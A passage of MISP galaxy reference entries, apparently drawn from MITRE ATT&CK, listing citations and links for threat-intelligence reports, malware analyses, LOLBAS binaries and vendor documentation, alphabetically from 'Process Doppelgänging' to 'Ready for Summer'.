hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="hasherezade Process Doppelgänging Dec 2017"

Table 15020. Table References

Links

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

Microsoft Processes and Threads

Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Processes and Threads"

Table 15021. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads

ProcessHacker Github

ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="ProcessHacker Github"

Table 15022. Table References

Links

https://github.com/processhacker/processhacker

Leitch Hollowing

Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Leitch Hollowing"

Table 15023. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

Korean FSI TA505 2020

Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Korean FSI TA505 2020"

Table 15024. Table References

Links

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

Microsoft Profiling Mar 2017

Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Microsoft Profiling Mar 2017"

Table 15025. Table References

Links

https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

Microsoft Win32

Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Microsoft Win32"

Table 15026. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/

CameraShy

ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China’s Unit 78020. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="CameraShy"

Table 15027. Table References

Links

http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf

Unit 42 ProjectM March 2016

Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Unit 42 ProjectM March 2016"

Table 15028. Table References

Links

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/

Kaspersky ProjectSauron Blog

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Kaspersky ProjectSauron Blog"

Table 15029. Table References

Links

https://securelist.com/faq-the-projectsauron-apt/75533/

Kaspersky TajMahal April 2019

GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Kaspersky TajMahal April 2019"

Table 15030. Table References

Links

https://securelist.com/project-tajmahal/90240/

DarkReading FireEye FIN5 Oct 2015

Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="DarkReading FireEye FIN5 Oct 2015"

Table 15031. Table References

Links

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

Talos Promethium June 2020

Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.

The tag is: misp-galaxy:references="Talos Promethium June 2020"

Table 15032. Table References

Links

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

TechNet Credential Guard

Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="TechNet Credential Guard"

Table 15033. Table References

Links

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard

Microsoft Protected Users Security Group

Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Microsoft Protected Users Security Group"

Table 15034. Table References

Links

https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group

CISA Remote Monitoring and Management Software

CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="CISA Remote Monitoring and Management Software"

Table 15035. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

Protecting Microsoft 365 From On-Premises Attacks

Microsoft. (2022, August 26). Protecting Microsoft 365 from on-premises attacks. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Protecting Microsoft 365 From On-Premises Attacks"

Table 15036. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/protect-m365-from-on-premises-attacks

SANS PsExec

Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="SANS PsExec"

Table 15037. Table References

Links

https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/

Docker Daemon Socket Protect

Docker. (n.d.). Protect the Docker Daemon Socket. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Daemon Socket Protect"

Table 15038. Table References

Links

https://docs.docker.com/engine/security/protect-access/

Malwarebytes Emotet Dec 2017

Smith, A. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Malwarebytes Emotet Dec 2017"

Table 15039. Table References

Links

https://support.malwarebytes.com/docs/DOC-2295

ProtocolHandler.exe - LOLBAS Project

LOLBAS. (2022, July 24). ProtocolHandler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ProtocolHandler.exe - LOLBAS Project"

Table 15040. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/

cybereason osx proton

Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="cybereason osx proton"

Table 15041. Table References

Links

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

Provlaunch.exe - LOLBAS Project

LOLBAS. (2023, June 30). Provlaunch.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Provlaunch.exe - LOLBAS Project"

Table 15042. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

FBI Proxies Credential Stuffing

FBI. (2022, August 18). Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts. Retrieved July 6, 2023.

The tag is: misp-galaxy:references="FBI Proxies Credential Stuffing"

Table 15043. Table References

Links

https://www.ic3.gov/Media/News/2022/220818.pdf

Sysdig Proxyjacking

Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.

The tag is: misp-galaxy:references="Sysdig Proxyjacking"

Table 15044. Table References

Links

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

Password Protected Word Docs

Lawrence Abrams. (2017, July 12). PSA: Don’t Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Password Protected Word Docs"

Table 15045. Table References

Links

https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/

Github PSAttack

Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="Github PSAttack"

Table 15046. Table References

Links

https://github.com/jaredhaight/PSAttack

PsExec Russinovich

Russinovich, M. (2004, June 28). PsExec. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="PsExec Russinovich"

Table 15047. Table References

Links

http://windowsitpro.com/systems-management/psexec

SANS UAC Bypass

Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="SANS UAC Bypass"

Table 15048. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

GitHub PSPKIAudit

HarmJ0y et al. (2021, June 16). PSPKIAudit. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub PSPKIAudit"

Table 15049. Table References

Links

https://github.com/GhostPack/PSPKIAudit

Psr.exe - LOLBAS Project

LOLBAS. (2020, June 27). Psr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Psr.exe - LOLBAS Project"

Table 15050. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Psr/

Microsoft PsSetCreateProcessNotifyRoutine routine

Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft PsSetCreateProcessNotifyRoutine routine"

Table 15051. Table References

Links

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

PTRACE man

Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer’s Manual. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="PTRACE man"

Table 15052. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

Wikipedia Public Key Crypto

Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Wikipedia Public Key Crypto"

Table 15053. Table References

Links

https://en.wikipedia.org/wiki/Public-key_cryptography

SingHealth Breach Jan 2019

Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited’s Patient Database. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="SingHealth Breach Jan 2019"

Table 15054. Table References

Links

https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx

pubprn

Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.

The tag is: misp-galaxy:references="pubprn"

Table 15055. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn

Pubprn.vbs - LOLBAS Project

LOLBAS. (2018, May 25). Pubprn.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pubprn.vbs - LOLBAS Project"

Table 15056. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Pubprn/

PaloAlto EncodedCommand March 2017

White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="PaloAlto EncodedCommand March 2017"

Table 15057. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

anomali-linux-rabbit

Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="anomali-linux-rabbit"

Table 15058. Table References

Links

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Anomali Linux Rabbit 2018

Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.

The tag is: misp-galaxy:references="Anomali Linux Rabbit 2018"

Table 15059. Table References

Links

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Cylance Putter Panda

Gross, J. and Walter, J. (2016, January 12). Puttering into the Future…. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="Cylance Putter Panda"

Table 15060. Table References

Links

http://blog.cylance.com/puttering-into-the-future

Oddvar Moe ADS1 Jan 2018

Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.

The tag is: misp-galaxy:references="Oddvar Moe ADS1 Jan 2018"

Table 15061. Table References

Links

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Oddvar Moe ADS2 Apr 2018

Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.

The tag is: misp-galaxy:references="Oddvar Moe ADS2 Apr 2018"

Table 15062. Table References

Links

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

Moran RDPieces

Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.

The tag is: misp-galaxy:references="Moran RDPieces"

Table 15063. Table References

Links

https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf

PuTTY Download Page

PuTTY. (n.d.). PuTTY Download Page. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="PuTTY Download Page"

Table 15064. Table References

Links

https://www.putty.org/

Wikipedia pwdump

Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Wikipedia pwdump"

Table 15065. Table References

Links

https://en.wikipedia.org/wiki/Pwdump

DFIR Pysa Nov 2020

The DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="DFIR Pysa Nov 2020"

Table 15066. Table References

Links

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

NHS Digital Pysa Oct 2020

NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="NHS Digital Pysa Oct 2020"

Table 15067. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3633

oletools toolkit

decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.

The tag is: misp-galaxy:references="oletools toolkit"

Table 15068. Table References

Links

https://github.com/decalage2/oletools

GitHub PoshC2

Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="GitHub PoshC2"

Table 15069. Table References

Links

https://github.com/nettitude/PoshC2_Python

Trend Micro Qakbot December 2020

Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Trend Micro Qakbot December 2020"

Table 15070. Table References

Links

https://success.trendmicro.com/solution/000283381

Cyberint Qakbot May 2021

Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Cyberint Qakbot May 2021"

Table 15071. Table References

Links

https://blog.cyberint.com/qakbot-banking-trojan

Kroll Qakbot June 2020

Sette, N. et al. (2020, June 4). Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Kroll Qakbot June 2020"

Table 15072. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks

Trend Micro Qakbot May 2020

Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Trend Micro Qakbot May 2020"

Table 15073. Table References

Links

https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files

Kaspersky QakBot September 2021

Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Kaspersky QakBot September 2021"

Table 15074. Table References

Links

https://securelist.com/qakbot-technical-analysis/103931/

Red Canary Qbot

Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Red Canary Qbot"

Table 15075. Table References

Links

https://redcanary.com/threat-detection-report/threats/qbot/

TheEclecticLightCompany Quarantine and the flag

hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="TheEclecticLightCompany Quarantine and the flag"

Table 15076. Table References

Links

https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/

GitHub QuasarRAT

MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="GitHub QuasarRAT"

Table 15077. Table References

Links

https://github.com/quasar/QuasarRAT

0DAY IN {REA_TEAM} Pikabot January 6 2024

0DAY IN {REA_TEAM}. (2024, January 6). [QuickNote] Technical Analysis of recent Pikabot Core Module. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="0DAY IN {REA_TEAM} Pikabot January 6 2024"

Table 15078. Table References

Links

https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/

DidierStevens SelectMyParent Nov 2009

Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="DidierStevens SelectMyParent Nov 2009"

Table 15079. Table References

Links

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

Microsoft - Azure AD App Registration - May 2019

Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - Azure AD App Registration - May 2019"

Table 15080. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app

Microsoft Azure Key Vault

Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Key Vault"

Table 15081. Table References

Links

https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli

Google Command Center Dashboard

Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Google Command Center Dashboard"

Table 15082. Table References

Links

https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard

Trend Micro R980 2016

Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.

The tag is: misp-galaxy:references="Trend Micro R980 2016"

Table 15083. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/

Costa AvosLocker May 2022

Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Costa AvosLocker May 2022"

Table 15084. Table References

Links

https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory

Sekoia.io Raccoon Stealer June 28 2022

Quentin Bourgue, Pierre Le Bourhis, Threat & Detection Research Team - TDR. (2022, June 28). Raccoon Stealer v2 – Part 1: The return of the dead. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Sekoia.io Raccoon Stealer June 28 2022"

Table 15085. Table References

Links

https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/

DOJ Iran Indictments March 2018

DOJ. (2018, March 23). U.S. v. Rafatnejad et al. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="DOJ Iran Indictments March 2018"

Table 15086. Table References

Links

https://www.justice.gov/usao-sdny/press-release/file/1045781/download

Sophos Ragnar May 2020

SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="Sophos Ragnar May 2020"

Table 15087. Table References

Links

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

GitHub Raindance

Stringer, M. (2018, November 21). RainDance. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="GitHub Raindance"

Table 15088. Table References

Links

https://github.com/True-Demon/raindance

Symantec RAINDROP January 2021

Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.

The tag is: misp-galaxy:references="Symantec RAINDROP January 2021"

Table 15089. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

Eset Ramsay May 2020

Sanmillan, I. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Eset Ramsay May 2020"

Table 15090. Table References

Links

https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/

Rancor Unit42 June 2018

Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Rancor Unit42 June 2018"

Table 15091. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

FBI-ransomware

FBI. (n.d.). Ransomware. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="FBI-ransomware"

Table 15092. Table References

Links

https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf

IBM Ransomware Trends September 2020

Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="IBM Ransomware Trends September 2020"

Table 15093. Table References

Links

https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/

DHS/CISA Ransomware Targeting Healthcare October 2020

DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="DHS/CISA Ransomware Targeting Healthcare October 2020"

Table 15094. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-302a

FireEye Ransomware Feb 2020

Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="FireEye Ransomware Feb 2020"

Table 15095. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

FireEye Ransomware Disrupt Industrial Production

Zafra, D., Lunden, K., Brubaker, N., Kennelly, J. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="FireEye Ransomware Disrupt Industrial Production"

Table 15096. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

Check Point Pay2Key November 2020

Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.

The tag is: misp-galaxy:references="Check Point Pay2Key November 2020"

Table 15097. Table References

Links

https://research.checkpoint.com/2020/ransomware-alert-pay2key/

Microsoft Ransomware as a Service

Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Microsoft Ransomware as a Service"

Table 15098. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

McAfee Maze March 2020

Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="McAfee Maze March 2020"

Table 15099. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

Sophos SystemBC December 16 2020

Sivagnanam Gn, Sean Gallagher. (2020, December 16). Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Sophos SystemBC December 16 2020"

Table 15100. Table References

Links

https://news.sophos.com/en-us/2020/12/16/systembc/

Trend Micro AvosLocker Apr 2022

Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Trend Micro AvosLocker Apr 2022"

Table 15101. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

Trend Micro Black Basta Spotlight September 2022

Trend Micro. (2022, September 1). Ransomware Spotlight Black Basta. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta Spotlight September 2022"

Table 15102. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

Trend Micro LockBit Spotlight February 08 2023

Trend Micro Research. (2022, February 8). Ransomware Spotlight: LockBit. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Trend Micro LockBit Spotlight February 08 2023"

Table 15103. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

Trend Micro Play Spotlight July 21 2023

Trend Micro Research. (2023, July 21). Ransomware Spotlight: Play. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Spotlight July 21 2023"

Table 15104. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play

Group IB Ransomware May 2020

Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="Group IB Ransomware May 2020"

Table 15105. Table References

Links

https://www.group-ib.com/whitepapers/ransomware-uncovered.html

GitHub ransomwatch

joshhighet. (n.d.). ransomwatch. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="GitHub ransomwatch"

Table 15106. Table References

Links

https://github.com/joshhighet/ransomwatch

PyPI RAR

mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="PyPI RAR"

Table 15107. Table References

Links

https://pypi.org/project/rarfile/

WinRAR Homepage

A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="WinRAR Homepage"

Table 15108. Table References

Links

https://www.rarlab.com/

Aquino RARSTONE

Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="Aquino RARSTONE"

Table 15109. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/

Rasautou.exe - LOLBAS Project

LOLBAS. (2020, January 10). Rasautou.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rasautou.exe - LOLBAS Project"

Table 15110. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rasautou/

Red Canary Raspberry Robin May 2022

Lauren Podber, Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Red Canary Raspberry Robin May 2022"

Table 15111. Table References

Links

https://redcanary.com/blog/raspberry-robin/

Microsoft Security Raspberry Robin October 2022

Microsoft Threat Intelligence. (2022, October 27). Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Microsoft Security Raspberry Robin October 2022"

Table 15112. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Dragos Raspite Aug 2018

Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.

The tag is: misp-galaxy:references="Dragos Raspite Aug 2018"

Table 15113. Table References

Links

https://www.dragos.com/blog/20180802Raspite.html

RATANKBA

Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="RATANKBA"

Table 15114. Table References

Links

https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html

TrendMicro RawPOS April 2015

TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="TrendMicro RawPOS April 2015"

Table 15115. Table References

Links

http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf

Rclone

Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Rclone"

Table 15116. Table References

Links

https://rclone.org

Rclone Wars

Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Rclone Wars"

Table 15117. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

rcsi.exe - LOLBAS Project

LOLBAS. (2018, May 25). rcsi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="rcsi.exe - LOLBAS Project"

Table 15118. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/

RDP Hijacking Medium

Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="RDP Hijacking Medium"

Table 15119. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

RDPWrap Github

Stas’M Corp. (2014, October 22). RDP Wrapper Library by Stas’M. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="RDPWrap Github"

Table 15120. Table References

Links

https://github.com/stascorp/rdpwrap

rdrleakdiag.exe - LOLBAS Project

LOLBAS. (2022, May 18). rdrleakdiag.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="rdrleakdiag.exe - LOLBAS Project"

Table 15121. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/

ESET RTM Feb 2017

Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="ESET RTM Feb 2017"

Table 15122. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

FireEye Sunshop Campaign May 2013

Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="FireEye Sunshop Campaign May 2013"

Table 15123. Table References

Links

